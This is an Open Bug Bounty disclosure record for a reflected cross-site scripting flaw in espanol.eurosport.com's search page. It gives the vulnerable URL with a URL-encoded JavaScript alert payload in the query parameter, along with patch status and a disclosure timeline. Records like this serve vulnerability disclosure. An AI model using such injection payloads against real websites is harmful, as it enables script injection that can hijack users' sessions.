espanol.eurosport.com XSS vulnerability

2015-07-11T22:20:00
ID OBB:71626
Type openbugbounty
Reporter dr1337mk
Modified 2016-01-30T21:13:00

Description

Vulnerable URL:
http://espanol.eurosport.com/_search_/search?q=%27%2Falert%28%2FXSSPOSED%2F%29%2F%27&client;=espanol-eurosport-com&proxystylesheet;=espanol-eurosport-com&site;=espanol-eurosport-com&access;=p&output;=xml_no_dtd&sort;=date%3AD%3AL%3Ad1&wc;=200&wc;_mc=1&oe;=UTF-8&ie;=UTF-8&ud;=1&exclude;_apps=1&ulang;=en&getfields;=*&partialfields;=%28availableOn%3A%7CavailableOn%3Aall%29&elang;=6&domain;=espanol.eurosport.com
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 21:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check espanol.eurosport.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 11 July, 2015 22:20 GMT
Vulnerability existence verified and confirmed| 11 July, 2015 22:22 GMT
Vulnerability patched by the website owner| 30 January, 2016 21:13 GMT